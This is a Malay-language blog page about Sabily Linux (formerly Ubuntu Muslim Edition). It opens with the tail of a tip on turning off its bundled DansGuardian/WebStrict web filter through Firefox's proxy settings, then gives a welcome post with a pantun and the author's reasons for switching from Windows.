4.Pergi ke Edit > Preferences.
5. Klik Advanced dan pergi ke tab Network. Klik Settings.
6. Klik butang radio "No Proxy" . Sekarang, DansGuardian tidak lagi mengganggu pelayaran laman sesawang anda. :)
Saya tak kata WebStrict ni tak bagus. Saya cuma tak suka perisian tapisan web sebab saya rasa agak terganggu.

Saya cadangkan WebStrict digunakan di kiosk internet percuma untuk mengelakkan pelanggan download benda yg bukan-bukan dan juga untuk ibubapa dalam menentukan laman sesawang yang perlu untuk anak-anak mereka.

Khamis, 5 Mac 2009

Selamat Datang Ke Blog Sabily untuk Malaysia

Syahadah awal rukun Islam,
Solat pula rukun kedua;
Awal bismillah pemula kalam,
Berkat Selawat pengiring kata.

Datang bertandang saya alukan,
Moga manfaat dikongsi bersama;
Selamat datang saya ucapkan,
Buat peminat sumber terbuka.


Assalamualaikum dan selamat sejahtera kepada semua ke blog Sabily untuk Malaysia. Di sini saya sertakan serba sedikit tujuan saya membina blog ini.

Pertama sekali, saya ingin membantu komuniti sumber terbuka dan yang baharu berjinak-jinak dengan sistem operasi dan perisian sumber terbuka untuk lebih mengenali khususnya Linux Sabily yang dahulunya dikenali sebagai Ubuntu Muslim Edition.

Komuniti Sabily terpaksa menukarkan nama sistem operasi ini kepada Sabily kerana "Ubuntu" merupakan tanda niaga(trademark) Canonical Ltd..

Untuk mereka yang masih tertanya-tanya apakah Ubuntu ini sebenarnya, boleh rujuk di http://ms.wikipedia.org/wiki/Ubuntu

Apakah kelainan Sabily berbanding distro Ubuntu yang asal? Tidak banyak bezanya melainkan add-on Edubuntu, Perisian Islam sumber terbuka, dan rekabentuk(theme) yang bercirikan Islamic di samping perisian-perisian lain yang sesuai untuk pengguna biasa (end-user).

Saya sendiri pun baru sahaja bertukar ke Linux Sabily sepenuhnya sebulan yg lepas :) walaupun saya telah menggunakan Ubuntu dengan dwi-boot selama setahun. Saya bertukar disebabkan perkara yang biasa dialami oleh pengguna sistem operasi Windows iaitu masalah virus, skrin biru BSOD (Blue Screen Of Death), dan prestasi yang hambar.

Maklumat lanjut mengenai Linux Sabily ini boleh dirujuk di http://www.ubuntume.com/website. Terdapat usaha sahabat-sahabat kita di Malaysia terlibat sama menterjemah laman web ini ke Bahasa Melayu.

Sekian sahaja sebagai awalul kalam blog ini. Wassalam.

carian google

Custom Search